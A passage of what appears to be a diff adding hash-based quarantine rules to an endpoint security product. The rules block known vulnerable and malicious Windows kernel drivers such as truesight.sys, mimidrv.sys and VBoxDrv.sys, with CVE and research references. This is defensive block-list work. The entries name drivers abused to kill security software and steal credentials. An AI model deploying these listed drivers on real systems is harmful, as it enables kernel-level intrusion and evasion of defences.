"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.815327Z", + "creation_date": "2026-03-23T11:45:31.815330Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.815336Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e37f93ceffb27551bf7d0af47a1ac1f4f371c2491bfe7b9160d83ccbf7432f65", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5d8bc37-9e2d-5c7a-8941-ea6d86fd4ce9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.465793Z", + "creation_date": "2026-03-23T11:45:30.465796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.465805Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "eab9b5b7e5fab1c2d7d44cd28f13ae8bb083d9362d2b930d43354a3dfd38e05a", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5defc21-5ca4-5d1b-ac53-04a75aa37e0b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
"rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611498Z", + "creation_date": "2026-03-23T11:45:29.611500Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611505Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a8a5aebf83d1fa6daf74e48fc600e22b8fdceafb5dd7c7e14db2aa2a28e8c24", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5e6b5cd-c77b-5317-85fc-46cc8ad01f8b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.822190Z", + "creation_date": "2026-03-23T11:45:30.822192Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.822198Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "91e5f702691772cd1291ffbd2b645f06fda3b7b2c31c04ca28a3f4d728875cc6", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) 
[https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5ea2f7d-5bb2-557a-85ab-152c67b0097c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140113Z", + "creation_date": "2026-03-23T11:45:31.140115Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140121Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ffb44c5c528aebbe6ba2c3512b7b38dbf87dcc0ffb061b242e497fa0a8b157e2", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5f57bc7-f9bb-5b55-baee-7a8521a85039", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.810973Z", + 
"creation_date": "2026-03-23T11:45:31.810975Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.810980Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "07a4ae3cfafd52437c1c3080ab38139c4a194db4e67a31a9118d799f04e9d356", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a5fbcbf4-4648-5581-b1f7-d1b990b37ae6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.973077Z", + "creation_date": "2026-03-23T11:45:29.973079Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.973085Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f85eb576acb5db0d2f48e5f09a7244165a876fa1ca8697ebb773e4d7071d4439", + "comment": "Elaborate Bytes vulnerable driver (aka ElbyCDIO.sys) [CVE-2009-0824] [https://www.loldrivers.io/drivers/855ade1f-8a9e-4c9d-ab8e-d7e409609852/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"a6074328-30a6-57d9-a7a4-a961ff0b47c1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500496Z", + "creation_date": "2026-03-23T11:45:31.500499Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500507Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ed9948c70d70c1027251b6bd689d4145c6de042122348ebbecdf21bb6af6dbd4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a609325d-57d9-51cc-8fad-a5c70dca285a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979692Z", + "creation_date": "2026-03-23T11:45:29.979694Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.979699Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "223b320fb86cd4a1019ce31ac6901ce6bc41792810bd995db232dad790398852", + "comment": "Malicious Kernel Driver (aka windbg.sys) [https://www.loldrivers.io/drivers/da7314dc-6cf1-4d74-a0d1-796fc08944f8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a614b181-20ff-5986-946e-992942f51cb7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156108Z", + "creation_date": "2026-03-23T11:45:31.156110Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156116Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e5a56c97fe3b994d0c73c1551cfcabfbd2e4ee7ce3fda9bc4d76f18c49c57145", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a61ad8a9-664a-59ae-a1eb-e091f2275a2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + 
"rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608814Z", + "creation_date": "2026-03-23T11:45:29.608815Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608821Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7dcd81140dc57d1d412c39940643ea923a1925815097f83788d840c1a7b57d25", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6274886-f7fb-54eb-b526-75efc4de47b2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160257Z", + "creation_date": "2026-03-23T11:45:31.160259Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160264Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"19df9b27dee18537afd1367f3c6eef1d230faa240b4855e856c37d3901a39aca", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a627b995-c62d-5876-9a7b-289c1940c199", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974281Z", + "creation_date": "2026-03-23T11:45:29.974283Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974289Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "dd54115ef08b107691425e4c0bf94dc0ae7c522fba60a0ce3f574ebf4f5dbc5a", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6374395-1056-51d6-933a-106cdaf69573", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160403Z", + "creation_date": "2026-03-23T11:45:31.160405Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160411Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "02190b5e96bad0a78fe6bc6f13a942bde1a96536693b3cea40082c0f1cfa45eb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6417a56-214e-538b-94b0-510530928d41", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615572Z", + "creation_date": "2026-03-23T11:45:29.615574Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615579Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5dfb950d4771c35f4f82626b5d8859cce74bf03db67f2be3036631894a62eca8", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, 
NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a642bf80-0921-55fe-807d-37394983ed61", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157222Z", + "creation_date": "2026-03-23T11:45:31.157224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13be73dd4f1e2db2a4621119f30429438a2331c5c7e1a07bf6f98ba96c16e069", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a647ebb2-66d0-5b95-b5eb-1e687e406b51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143961Z", + 
"creation_date": "2026-03-23T11:45:32.143964Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "828c54cfecb2a08863319544ac716aee3898dfe78a87d7757a0e92f1b1f1daf1", + "comment": "Vulnerable Kernel Driver (aka CSC.sys) [https://www.loldrivers.io/drivers/1c92e1bf-103b-4545-b242-e5a9858ec9c8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a64c1161-3379-5369-8f72-ebdcc4708aa7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491320Z", + "creation_date": "2026-03-23T11:45:31.491323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491330Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b625c7345f7a62e55948a916d0f6e6a9d8f836703a5d22f196b8b322e030596d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a658f3fe-1258-5534-bfd0-9cf13cfa6827", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812351Z", + "creation_date": "2026-03-23T11:45:31.812354Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812364Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2a4339bc237e6e415e6a754864933793d9397a1cd968b569d49c96ca141f599a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a65cb1b7-cc50-5908-9688-4f6c902816e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.827265Z", + "creation_date": "2026-03-23T11:45:31.827269Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:31.827277Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "58cb3c3716f8079ebed0ee562944bfde2d4aa80101f20fde64bf04359748da37", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a66a31b0-5be6-52de-ac8c-a35b0796bd25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.830320Z", + "creation_date": "2026-03-23T11:45:31.830323Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.830331Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8f71ef083ea97d9d6592f47a57c52cc6957ba2f356fa2b122a9539ddac4623f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a67209af-ad96-505e-be74-afa40c793bea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.500548Z", + "creation_date": "2026-03-23T11:45:31.500552Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.500560Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "bb015d75e98e2633b848af2b60af346dcdc9c04f00826b231bfd8f6c1ed5a41b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a684e42b-479f-516c-86af-e32b3433738a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154111Z", + "creation_date": "2026-03-23T11:45:31.154113Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154118Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "294ef849be00f2170346427b820cb55e31dd56c968123f56cd7c9dc7943de849", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a69c2f15-320a-5da4-b433-0919232f9f51", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.813896Z", + "creation_date": "2026-03-23T11:45:31.813898Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.813903Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "032ae4119bbded768bf334d9148771b0fc07ae15bdc6e29999527895e7f63c4a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "a6a9032e-4e8f-5e26-b152-167a54ad7a5c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
